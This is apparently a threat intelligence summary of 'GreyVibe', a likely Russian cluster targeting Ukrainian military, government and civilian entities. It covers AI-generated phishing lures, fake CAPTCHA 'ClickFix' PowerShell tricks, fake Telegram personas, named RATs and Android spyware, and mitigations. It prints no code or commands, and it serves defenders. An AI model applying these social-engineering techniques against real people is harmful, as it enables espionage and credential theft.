Full Report
A likely Russian threat cluster tracked as GreyVibe has been targeting Ukrainian entities with AI-generated lures and a rich set of custom malware tools. [...]
Analysis Summary
# Threat Actor: GreyVibe
## Attribution & Identity
* **Identification:** Likely Russian-speaking threat cluster exhibiting characteristics of both nation-state operations and cybercriminal activity.
* **Aliases/Associations:** Possible links to **UAC-0098** (former TrickBot members) due to the use of a unique ISO builder.
* **Identity Indicators:** Use of Russian language in malware panels and code comments; C2 servers configured to UTC+3 (Moscow time).
* **Nature of Group:** Researchers describe it as a "hybrid" team potentially consisting of former cybercriminals absorbed into state-backed groups or operating under state-directed tasking.
## Activity Summary
GreyVibe has been active since at least **August 2025**. The group is noted for using GenAI (ChatGPT, Gemini, Ideogram) to create highly realistic lures and custom obfuscation tools. Their focus is primarily on espionage and intelligence gathering against Ukrainian targets through several distinct campaign streams.
## Tactics, Techniques & Procedures
* **AI-Enhanced Lures:** Use of LLMs to generate realistic phishing content and high-quality images for fake websites.
* **Social Engineering:**
* **PhantomMail:** Spear-phishing with malicious archives hosted on Google Drive and 4sync.
* **PhantomClick:** Using "ClickFix" or fake CAPTCHA pages to trick users into executing PowerShell commands (Fake Cloudflare/Zoom prompts).
* **PrincessClub:** Use of fake female Telegram personas and WebRTC-based live calls to lure targets.
* **Credential/Data Theft:** Execution of PowerShell-based RATs to exfiltrate browser credentials, Telegram/WhatsApp data, and system files.
* **Evasion:** use of custom obfuscators (LOOKVALPS, LOOKVALJS, etc.) likely developed with AI assistance.
* **Anomalous Behavior:** Deployment of cryptocurrency miners on some targets and uploading test samples to public scanning platforms (indicating a lower level of operational security/discipline than traditional APTs).
## Targeting
* **Sectors:** Military, government, civilian, energy, telecommunications, and business sectors.
* **Geography:** Primarily Ukraine or Ukraine-related organizations.
* **Victims:** Military personnel (via fake communication portals and drone charity sites), and individuals interested in dating/adult sites.
## Tools & Infrastructure
* **Custom Malware Families:**
* **LegionRelay:** PowerShell-based RAT for file theft, screenshots, and RDP setup.
* **PhantomRelay:** PowerShell RAT used for system fingerprinting and dynamic script loading.
* **FallSpy:** Android spyware for collecting contacts, call logs, location, and media.
* **Obfuscators:** LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP.
* **Infrastructure:**
* **Lure Domains:** `zoom`, `LAPAS`, `СПО НЕБО` (fake Russian military login), and fake drone charity platforms.
* **C2/Hosting:** Google Drive, 4sync, and WebRTC for live captures.
## Implications
GreyVibe represents a shift toward "AI-powered" threat actors where the barrier to entry for high-quality social engineering and custom code obfuscation is lowered by LLMs. Their hybrid nature (criminal/state-aligned) suggests that Russia may be increasingly leveraging or absorbing privateers to conduct espionage against Ukraine, leading to a blend of high-end lures and sometimes sloppy operational security.
## Mitigations
* **Endpoint Security:** Monitor for unauthorized PowerShell execution, especially those involving network connections or credential store access.
* **Identity Protection:** Implement MFA and educate users on "ClickFix"/Fake CAPTCHA tactics where they are prompted to paste commands into a terminal.
* **Mobile Defense:** Vet mobile applications and educate high-risk personnel (military/gov) on the dangers of side-loading apps from dating or charity websites.
* **IOC Blocking:** Implement blocking for indicators provided by WithSecure (e.g., at `github[.]com/WithSecureLabs/iocs/blob/master/GREYVIBE/greyvibe_iocs.csv`).